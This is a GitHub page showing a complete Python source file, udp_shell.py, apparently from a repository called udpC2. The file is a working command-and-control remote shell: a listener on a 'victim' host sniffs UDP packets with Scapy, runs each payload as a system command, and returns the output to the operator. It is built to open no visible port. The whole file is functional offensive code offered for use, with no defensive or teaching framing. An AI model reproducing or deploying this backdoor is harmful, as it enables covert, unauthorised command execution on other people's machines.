udpC2/udp_shell.py at main · Exido-Rio/udpC2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
from scapy.all import sniff, UDP, IP,send,Raw
import os
import random
import argparse
from multiprocessing import Process

# needs root to run although don't expose any port
# we must start the listener first on the victim

parser = argparse.ArgumentParser(description="")


parser.add_argument("-s", "--src",required=True, type=str, help="data is coming from (remote ip )")
parser.add_argument("-d", "--des", required=True,type=str, help="data is coming to (local ip)  ")
parser.add_argument("-v", "--verbose",action="store_true", help="for verbose info  ")
parser.add_argument("-l", "--listen",action="store_true", help="To be a listener ")
args = parser.parse_args()


def sniffer():
    print("Starting UDP packet sniffer...")
    sniff(filter="udp", prn=process_packet, store=0)


def send_back(sendinfo):

    packet = IP(dst=sendinfo["dip"]) / UDP(sport=sendinfo["sp"], dport=sendinfo["dp"]) / Raw(load=sendinfo["reply"])

    send(packet)


def packet_info(ip_layer,udp_layer):
    print("\n--- UDP Packet ---")
    print(f"Source IP: {ip_layer.src}")
    print(f"Destination IP: {ip_layer.dst}")
    print(f"Source Port: {udp_layer.sport}")
    print(f"Destination Port: {udp_layer.dport}")


def handle_operation(ip_layer,udp_layer):

    if args.verbose:
        packet_info(ip_layer,udp_layer)

    payload = bytes(udp_layer.payload).decode('utf-8', errors='ignore').strip("\0")
    print(f"\n[*] Result : {payload} ")
    sendinfo = {
        "dip" : ip_layer.src,
        "dp" : random.randint(50000,60000),
        "sp" : random.randint(50000,60000),
        "reply" : ""
    }
    if args.listen:
        if payload == 'exit':
            print("[+]Stopping UDP C2...")
            os._exit(0)

        msg = os.popen(payload).readlines()
        if args.verbose:
            print(f"[*] Output: {msg}")

        sendinfo["reply"] = ''.join(msg)
        send_back(sendinfo)


def process_packet(packet):

    if IP not in packet or UDP not in packet:
        # Ignore non-IP or non-UDP packets
        return
    if UDP in packet:
        ip_layer = packet[IP]
        udp_layer = packet[UDP]
        if ip_layer.src == args.src and ip_layer.dst == args.des :
            handle_operation(ip_layer,udp_layer)


def main():
    sniffing = Process(target=sniffer)
    sniffing.start()
    print("[+]UDP C2 started!")
    sendinfo = {
        "dip" : args.src,
        "dp" : random.randint(50000,60000),
        "sp" : random.randint(50000,60000),
        "reply" : ""
    }
    while True and not(args.listen):
        msg = input("[+] Shell: ")
        if msg == 'exit':
            sendinfo["reply"] = msg
            send_back(sendinfo)
            print("[+]Stopping UDP C2...")
            sniffing.terminate()
            break
        elif msg == '':
            pass
        else:
            sendinfo["reply"] = msg
            send_back(sendinfo)

    sniffing.join()

if __name__ == "__main__":
    main()